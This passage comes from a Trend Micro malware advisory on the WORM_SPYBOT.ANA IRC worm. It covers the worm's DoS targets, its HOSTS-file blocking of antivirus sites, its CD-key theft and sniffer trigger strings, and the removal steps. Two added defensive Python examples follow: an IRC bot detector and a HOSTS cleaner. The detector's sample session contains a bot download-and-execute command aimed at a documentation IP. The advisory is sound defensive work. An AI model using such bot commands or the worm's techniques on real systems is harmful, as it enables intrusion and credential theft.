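Because the control channel is plain IRC on an arbitrary port, a port-agnostic check on the TCP payload is the practical way to spot the check-in described above. The code below is an added example, not part of the Trend Micro write-up: it parses RFC 1459-style IRC lines out of a constructed session, records the NICK/USER registration, the channel joined, and any PRIVMSG whose text begins with one of the command-prefix characters that appear in the worm's own sniffer strings (! . $ % and so on), which is how orders such as download-and-execute are issued to bots of this family. The server name irc.example.invalid, the channel, nick, key and URL are made up.

```python
"""Spot an IRC bot check-in in captured TCP payload, on any port.

Added example, not part of the Trend Micro write-up. The worm's backdoor
is plain IRC, so the registration (NICK/USER), the channel JOIN and the
commands carried in PRIVMSG are recognisable whatever port the server
listens on. The command prefixes are the ones the worm's own sniffer
strings use (:!login, :.login, :$login and so on). The session below is
constructed; server, channel, nick and URL are hypothetical.
"""
import re

COMMAND_PREFIXES = set("!.$%&*,/?@\\~=-'")

_IRC_RE = re.compile(
    r"^(?::(?P<prefix>\S+) )?"          # optional :prefix
    r"(?P<cmd>[A-Za-z]+|\d{3})"         # command word or numeric reply
    r"(?P<params>(?: [^:\s]\S*)*)"      # middle params (no leading ':')
    r"(?: :(?P<trailing>.*))?$"         # optional :trailing text
)

SAMPLE_SESSION = "\r\n".join([
    "NICK [XP|USA|1234567]",                        # constructed bot nick
    "USER xpusa 0 0 :xpusa",
    ":irc.example.invalid 001 [XP|USA|1234567] :Welcome",
    "JOIN #bots k3y",
    ":ops!u@h PRIVMSG #bots :.login s3cret",
    ":ops!u@h PRIVMSG #bots :.download http://203.0.113.9/upd.exe c:\\upd.exe 1",
    ":ops!u@h PRIVMSG #bots :hello everyone",      # ordinary chat line
    "PING :irc.example.invalid",
    "PONG :irc.example.invalid",
])


def parse_irc_line(line):
    """Return (prefix, COMMAND, [params], trailing) or None if not IRC."""
    m = _IRC_RE.match(line)
    if not m:
        return None
    return m.group("prefix"), m.group("cmd").upper(), m.group("params").split(), m.group("trailing")


def analyse_stream(payload):
    """Summarise an IRC conversation found in raw TCP payload text."""
    summary = {"registered": False, "nick": None, "channels": [], "commands": []}
    saw_nick = saw_user = False
    for line in payload.split("\r\n"):
        parsed = parse_irc_line(line)
        if parsed is None:
            continue
        _, cmd, params, trailing = parsed
        if cmd == "NICK" and params:
            saw_nick, summary["nick"] = True, params[0]
        elif cmd == "USER":
            saw_user = True
        elif cmd == "JOIN" and params:
            summary["channels"].extend(params[0].split(","))
        elif cmd == "PRIVMSG" and trailing and trailing[0] in COMMAND_PREFIXES:
            summary["commands"].append(trailing)   # bot order, not chat
    summary["registered"] = saw_nick and saw_user
    return summary


def is_irc_bot_session(payload):
    """Heuristic: a registered IRC session that joins a channel and then
    receives at least one prefix-style bot command."""
    s = analyse_stream(payload)
    return s["registered"] and bool(s["channels"]) and bool(s["commands"])
```

Run it over reassembled TCP streams rather than single packets, since the registration and the first command may be several segments apart; a stream that registers and joins a channel but never receives a prefixed command is more likely a human IRC client.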

Denial of Service Attack

Part of this worm's backdoor capability is launching denial of service (DoS) attacks against the following Web sites using the following flooding methods:

Web sites:

  • de.yahoo.com
  • nitro.ucsc.edu
  • verio.fr
  • www.1und1.de
  • www.above.net
  • www.belwue.de
  • www.burst.net
  • www.cogentco.com
  • www.d1asia.com
  • www.easynews.com
  • www.google.com
  • www.level3.com
  • www.lib.nthu.edu.tw
  • www.nifty.com
  • www.nocster.com
  • www.rit.edu
  • www.schlund.net
  • www.st.lib.keio.ac.jp
  • www.stanford.edu
  • www.switch.ch
  • www.utwente.nl
  • www.verio.com
  • www.xo.net
  • yahoo.co.jp

Flooding methods:

  • DDoS flood
  • ICMP flood
  • PING flood
  • SKYSYN flood
  • SYN flood
  • UDP flood

HOSTS File Modification

This worm modifies the Windows HOSTS file located in %System%\Drivers\etc folder by appending a list of Web site addresses that are directed to the loopback address 127.0.0.1.

(Note: %System% is the Windows system folder, which is usually C:\WINNT\System32 on Windows NT and 2000, or C:\Windows\System32 on Windows XP and Server 2003.)

As a result, affected users are redirected to the local machine whenever they attempt to access the following Web sites, most of which belong to antivirus vendors, so signature updates and removal tools cannot be fetched from them:

  • avp.com
  • ca.com
  • customer.symantec.com
  • dispatch.mcafee.com
  • download.mcafee.com
  • f-secure.com
  • kaspersky.com
  • kaspersky-labs.com
  • liveupdate.symantec.com
  • liveupdate.symantecliveupdate.com
  • mast.mcafee.com
  • mcafee.com
  • my-etrust.com
  • nai.com
  • networkassociates.com
  • rads.mcafee.com
  • secure.nai.com
  • securityresponse.symantec.com
  • sophos.com
  • symantec.com
  • trendmicro.com
  • update.symantec.com
  • updates.symantec.com
  • us.mcafee.com
  • viruslist.com
  • www.avp.com
  • www.ca.com
  • www.f-secure.com
  • www.grisoft.com
  • www.kaspersky.com
  • www.mcafee.com
  • www.my-etrust.com
  • www.nai.com
  • www.networkassociates.com
  • www.sophos.com
  • www.symantec.com
  • www.trendmicro.com
  • www.viruslist.com

Information Theft

This worm also steals the Microsoft Windows Product ID and the CD keys of the following games, where installed:

  • Battlefield 1942
  • Battlefield 1942 (Road To Rome)
  • Battlefield 1942 (Secret Weapons of WWII)
  • Battlefield Vietnam
  • Black and White
  • Chrome
  • Command and Conquer: Generals
  • Command and Conquer: Generals (Zero Hour)
  • Command and Conquer: Red Alert
  • Command and Conquer: Red Alert 2
  • Command and Conquer: Tiberian Sun
  • Counter-Strike (Retail)
  • FIFA 2002
  • FIFA 2003
  • Freedom Force
  • Global Operations
  • Gunman Chronicles
  • Half-Life
  • Hidden & Dangerous 2
  • IGI 2: Covert Strike
  • Industry Giant 2
  • James Bond 007: Nightfire
  • Legends of Might and Magic
  • Medal of Honor: Allied Assault
  • Medal of Honor: Allied Assault: Breakthrough
  • Medal of Honor: Allied Assault: Spearhead
  • Microsoft Windows Product ID
  • Nascar Racing 2002
  • Nascar Racing 2003
  • Need For Speed Hot Pursuit 2
  • Need For Speed: Underground
  • Neverwinter Nights
  • Neverwinter Nights (Hordes of the Underdark)
  • Neverwinter Nights (Shadows of Undrentide)
  • NHL 2002
  • NHL 2003
  • NOX
  • Rainbow Six III RavenShield
  • Shogun: Total War: Warlord Edition
  • Soldier of Fortune II - Double Helix
  • Soldiers Of Anarchy
  • The Gladiators
  • Unreal Tournament 2003
  • Unreal Tournament 2004

It also uses its Carnivore sniffer to capture passwords and other sensitive information from network traffic, triggering on packets that contain the following strings:

  • CDKey
  • : auth
  • : login
  • :!auth
  • :!hashin
  • :!login
  • :!secure
  • :!syn
  • :$auth
  • :$hashin
  • :$login
  • :$syn
  • :%auth
  • :%hashin
  • :%login
  • :%syn
  • :&auth
  • :&login
  • :*auth
  • :*login
  • :,auth
  • :,login
  • :.auth
  • :.hashin
  • :.login
  • :.secure
  • :.syn
  • :/auth
  • :/login
  • :?auth
  • :?login
  • :@auth
  • :@login
  • :\auth
  • :\login
  • :~auth
  • :~login
  • :%20auth
  • :%20login
  • :=auth
  • :=login
  • :'auth
  • :-auth
  • :'login
  • :-login
  • JOIN #
  • login
  • NICK
  • OPER
  • oper
  • PASS
  • paypal
  • PAYPAL
  • paypal.com
  • PAYPAL.COM
  • USER

Platforms Affected

This worm affects computers running on Windows NT, 2000, XP, and Server 2003.

Analysis By: Zeus M. Laguerta


SOLUTION


Minimum scan engine version needed: 7.000

Pattern file needed: 3.176.03

Pattern release date: Jan 25, 2006


Important note: The "Minimum scan engine" refers to the earliest Trend Micro scan engine version guaranteed to detect this threat. However, Trend Micro strongly recommends that you update to the latest version in order to get comprehensive protection. Download the latest scan engine from the Trend Micro Web site.

Solution:

Terminating the Malware Program

Since this malware uses the file name of a legitimate program, it is necessary to use a third-party process viewer such as Process Explorer to single out the malware process by its location: the legitimate Mozilla Firefox browser runs from its installation folder under Program Files, whereas the worm's copy runs from the Windows system folder.

If the process you are looking for is not in the list displayed by Process Explorer, proceed to the succeeding solution set.

  1. Download Process Explorer.
  2. Extract the contents of the compressed (ZIP) file to a location of your choice.
  3. Execute Process Explorer by double-clicking procexp.exe.
  4. In the Process Explorer window, locate the process:
    FIREFOX.EXE
  5. Right-click the malware process, and choose Properties.
  6. Check if the value for the Current Directory is the following:
    %System%
    (Note: %System% is the Windows system folder, which is usually C:\WINNT\System32 on Windows NT and 2000, or C:\Windows\System32 on Windows XP and Server 2003.)
  7. If yes, then right-click on the malware process, and click Kill Process Tree.
  8. Close Process Explorer.

*NOTE: If the process you are looking for is not in the list displayed by Process Explorer, continue with the next solution procedure, noting any additional instructions. If the malware process is listed but you are unable to terminate it, restart your computer in safe mode and repeat the steps above.

Editing the Registry

This malware modifies the computer's registry. Users affected by this malware may need to modify or delete specific registry keys or entries. For detailed information regarding registry editing, please refer to the following articles from Microsoft:

  1. HOW TO: Backup, Edit, and Restore the Registry in Windows NT 4.0
  2. HOW TO: Backup, Edit, and Restore the Registry in Windows 2000
  3. HOW TO: Back Up, Edit, and Restore the Registry in Windows XP and Server 2003

Removing Autostart Entries from the Registry

Removing autostart entries from the registry prevents the malware from executing at startup.

If the registry entries below are not found, the malware may not have executed as of detection. If so, proceed to the succeeding solution set.

  1. Open Registry Editor. Click Start>Run, type REGEDIT, then press Enter.
  2. In the left panel, double-click the following:
    HKEY_CURRENT_USER>Software>Microsoft>
    Windows>CurrentVersion>Run
  3. In the right panel, locate and delete the entry:
    Windows Internet Explorer 6 = "firefox.exe"
  4. In the left panel, double-click the following:
    HKEY_CURRENT_USER>SOFTWARE>Microsoft>
    Windows>CurrentVersion>RunServices
  5. In the right panel, locate and delete the entry:
    Windows Internet Explorer 6 = "firefox.exe"
  6. In the left panel, double-click the following:
    HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>
    Windows>CurrentVersion>Run
  7. In the right panel, locate and delete the entry:
    Windows Internet Explorer 6 = "firefox.exe"
  8. In the left panel, double-click the following:
    HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>
    Windows>CurrentVersion>RunServices
  9. In the right panel, locate and delete the entry:
    Windows Internet Explorer 6 = "firefox.exe"
  10. Close Registry Editor.

Removing Malware Entries from the HOSTS File

Deleting malware entries from the HOSTS file restores the host name mappings that the malware altered.

  1. Open the following file using a text editor (such as NOTEPAD):
    • On Windows NT, 2000, XP, and Server 2003:
      %System%\drivers\etc\HOSTS
  2. Delete the following entries:
    • 127.0.0.1 www.grisoft.com
    • 127.0.0.1 www.trendmicro.com
    • 127.0.0.1 trendmicro.com
    • 127.0.0.1 rads.mcafee.com
    • 127.0.0.1 customer.symantec.com
    • 127.0.0.1 liveupdate.symantec.com
    • 127.0.0.1 us.mcafee.com
    • 127.0.0.1 updates.symantec.com
    • 127.0.0.1 update.symantec.com
    • 127.0.0.1 www.nai.com
    • 127.0.0.1 nai.com
    • 127.0.0.1 secure.nai.com
    • 127.0.0.1 dispatch.mcafee.com
    • 127.0.0.1 download.mcafee.com
    • 127.0.0.1 www.my-etrust.com
    • 127.0.0.1 my-etrust.com
    • 127.0.0.1 mast.mcafee.com
    • 127.0.0.1 ca.com
    • 127.0.0.1 www.ca.com
    • 127.0.0.1 networkassociates.com
    • 127.0.0.1 www.networkassociates.com
    • 127.0.0.1 avp.com
    • 127.0.0.1 www.kaspersky.com
    • 127.0.0.1 www.avp.com
    • 127.0.0.1 kaspersky-labs.com
    • 127.0.0.1 kaspersky.com
    • 127.0.0.1 www.f-secure.com
    • 127.0.0.1 f-secure.com
    • 127.0.0.1 viruslist.com
    • 127.0.0.1 www.viruslist.com
    • 127.0.0.1 liveupdate.symantecliveupdate.com
    • 127.0.0.1 mcafee.com
    • 127.0.0.1 www.mcafee.com
    • 127.0.0.1 sophos.com
    • 127.0.0.1 www.sophos.com
    • 127.0.0.1 symantec.com
    • 127.0.0.1 securityresponse.symantec.com
    • 127.0.0.1 www.symantec.com
  3. Save the file and close the text editor.
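
The manual HOSTS edit above can be automated, and made more general than the fixed domain list: what matters is any entry that sends a name other than localhost to a loopback address. The function below is an added example, not part of the Trend Micro write-up. It keeps comments, blank lines, the line-ending style and genuine entries untouched, removes every loopback redirection of a non-localhost name, and returns what it removed so the change can be reviewed. The sample file content is constructed.

```python
"""Remove malware-added loopback redirections from a Windows HOSTS file.

Added example, not part of the Trend Micro write-up. Rather than matching
only the fixed domain list, it removes every entry that maps a name other
than localhost to a loopback address (127.0.0.0/8 or ::1), which is the
effect the worm relies on, and reports what it removed. Comments, blank
lines and genuine entries are preserved as they are. The sample content
is constructed.
"""
import ipaddress

# A real file sits at %System%\drivers\etc\hosts and is usually CRLF-terminated.
SAMPLE_HOSTS = "\r\n".join([
    "# Copyright (c) 1993-1999 Microsoft Corp.",
    "#",
    "127.0.0.1       localhost",
    "10.0.0.5        intranet.corp.example   # legitimate internal alias",
    "127.0.0.1 www.trendmicro.com",
    "127.0.0.1 liveupdate.symantec.com",
    "127.0.0.1 rads.mcafee.com",
    "127.0.0.1\tsecurityresponse.symantec.com",
    "",
])

LEGITIMATE_LOOPBACK_NAMES = {"localhost", "localhost.localdomain"}


def _is_loopback(token):
    """True for 127.x.x.x and ::1; False for anything that is not an address."""
    try:
        return ipaddress.ip_address(token).is_loopback
    except ValueError:
        return False


def is_malicious_entry(line):
    """True if the line maps a non-localhost name to a loopback address.

    A line that mixes localhost with another name (127.0.0.1 localhost
    www.sophos.com) is still flagged, because the extra name is redirected.
    """
    body = line.split("#", 1)[0].strip()   # ignore trailing comments
    if not body:
        return False
    fields = body.split()
    if len(fields) < 2 or not _is_loopback(fields[0]):
        return False
    names = {f.lower() for f in fields[1:]}
    return not names <= LEGITIMATE_LOOPBACK_NAMES


def clean_hosts(text):
    """Return (cleaned_text, removed_lines); line endings are kept as found."""
    newline = "\r\n" if "\r\n" in text else "\n"
    kept, removed = [], []
    for line in text.split(newline):
        (removed if is_malicious_entry(line) else kept).append(line)
    return newline.join(kept), removed
```

Run it on a copy of %System%\drivers\etc\hosts, review the removed list, then write the cleaned text back; do this after the malware process has been terminated, as the solution order above requires.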

Important Windows XP Cleaning Instructions

Users running Windows XP must disable System Restore to allow full scanning of infected computers.

Users running other Windows versions can proceed with the succeeding solution set(s).

Running Trend Micro Antivirus

If you are currently running in safe mode, please restart your computer normally before performing the following solution.

Scan your computer with Trend Micro antivirus and delete files detected as WORM_SPYBOT.ANA. To do this, Trend Micro customers must download the latest virus pattern file and scan their computer. Other Internet users can use HouseCall, the Trend Micro online virus scanner.

Applying Patches

This malware exploits known vulnerabilities in Windows. Download and install the patches provided by Microsoft in the following security bulletins:

  • MS03-026 (Buffer Overrun In RPC Interface Could Allow Code Execution)
  • MS04-007 (ASN.1 Vulnerability Could Allow Code Execution)
  • MS04-011 (Security Update for Microsoft Windows, 835732)

(Note: MS03-039 is the updated patch for MS03-026.)

For the Veritas Backup Exec Name Service vulnerability, please go to the Veritas Web site for information on product patches.

Refrain from using Backup Exec until the appropriate patch has been installed. Trend Micro advises users to download critical patches upon release by vendors.



